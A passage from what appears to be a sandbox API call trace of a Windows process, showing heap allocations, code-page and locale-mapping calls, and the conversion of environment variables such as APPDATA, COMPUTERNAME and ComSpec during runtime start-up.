Size=0xd2) returned 0x651940 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x7c) returned 0x651a20 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x36) returned 0x651aa8 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3a) returned 0x645008 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x90) returned 0x651ae8 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x24) returned 0x64ab50 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x30) returned 0x64b1d8 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x36) returned 0x651b80 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x48) returned 0x646d68 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x52) returned 0x651bc0 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3c) returned 0x645050 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x82) returned 0x651c20 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2e) returned 0x64b210 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1e) returned 0x64f270 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2c) returned 0x64b248 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x54) returned 0x651cb0 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x52) returned 0x651d10 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2a) returned 0x64b280 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3c) returned 0x645098 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x54) returned 0x651d70 [0071.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x24) returned 0x64ab80 [0071.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x30) returned 0x64b2b8 [0071.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x8c) returned 0x651dd0 [0071.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x650b10 | out: hHeap=0x630000) returned 1 [0071.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x800) returned 0x650038 [0071.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x80) returned 0x651e68 [0071.600] GetLastError () returned 0x0 [0071.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x220) returned 0x650840 [0071.600] GetLastError () returned 0x0 [0071.600] IsValidCodePage (CodePage=0x4e4) returned 1 [0071.601] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f33c | out: lpCPInfo=0x18f33c) returned 1 [0071.606] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ee04 | out: lpCPInfo=0x18ee04) returned 1 [0071.633] GetLastError () returned 0x0 [0071.640] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0071.640] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e948, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0071.640] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18f118, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿw5Ç{Tó\x18", lpUsedDefaultChar=0x0) returned 256 [0071.640] GetLastError () returned 0x0 [0071.640] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0071.640] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e958, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0071.640] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18f018, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿw5Ç{Tó\x18", lpUsedDefaultChar=0x0) returned 256 [0071.647] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0071.647] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x4043b5 [0071.679] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651e68) returned 0x80 [0071.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0071.693] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1f) returned 0x64f298 [0071.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x64f298, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0071.699] GetLastError () returned 0x0 [0071.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x651ef0 [0071.699] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651ef0) returned 0x4 [0071.700] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x651ef0, Size=0x8) returned 0x651ef0 [0071.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0071.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x36) returned 0x651f00 [0071.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x651f00, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0071.700] GetLastError () returned 0x0 [0071.706] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651ef0) returned 0x8 [0071.707] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x651ef0, Size=0xc) returned 0x651f40 [0071.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0071.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x37) returned 0x651f58 [0071.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x651f58, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0071.707] GetLastError () returned 0x0 [0071.707] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651f40) returned 0xc [0071.707] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x651f40, Size=0x10) returned 0x651f40 [0071.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0071.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3c) returned 0x6450e0 [0071.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x6450e0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0071.707] GetLastError () returned 0x0 [0071.707] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651f40) returned 0x10 [0071.707] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x651f40, Size=0x14) returned 0x651f98 [0071.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0071.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x31) returned 0x650a68 [0071.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x650a68, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0071.708] GetLastError () returned 0x0 [0071.708] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651f98) returned 0x14 [0071.708] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x651f98, Size=0x18) returned 0x651f98 [0071.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0071.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x17) returned 0x651fb8 [0071.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x651fb8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0071.708] GetLastError () returned 0x0 [0071.708] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651f98) returned 0x18 [0071.708] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x651f98, Size=0x1c) returned 0x650aa8 [0071.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0071.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x24) returned 0x64abb0 [0071.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x64abb0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0071.709] GetLastError () returned 0x0 [0071.709] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650aa8) returned 0x1c [0071.709] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650aa8, Size=0x20) returned 0x650aa8 [0071.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0071.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x14) returned 0x651f98 [0071.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x651f98, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0071.709] GetLastError () returned 0x0 [0071.709] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650aa8) returned 0x20 [0071.709] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650aa8, Size=0x24) returned 0x650aa8 [0071.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0071.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0xd) returned 0x64e8d0 [0071.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x64e8d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0071.711] GetLastError () returned 0x0 [0071.712] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650aa8) returned 0x24 [0071.712] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650aa8, Size=0x28) returned 0x650aa8 [0071.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0071.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x25) returned 0x64abe0 [0071.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x64abe0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0071.712] GetLastError () returned 0x0 [0071.712] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650aa8) returned 0x28 [0071.712] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650aa8, Size=0x2c) returned 0x650aa8 [0071.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0071.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x39) returned 0x645128 [0071.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x645128, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0071.712] GetLastError () returned 0x0 [0071.712] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650aa8) returned 0x2c [0071.712] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650aa8, Size=0x30) returned 0x650aa8 [0071.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0071.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x18) returned 0x650ae0 [0071.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x650ae0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0071.712] GetLastError () returned 0x0 [0071.713] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650aa8) returned 0x30 [0071.713] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650aa8, Size=0x34) returned 0x650b00 [0071.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, 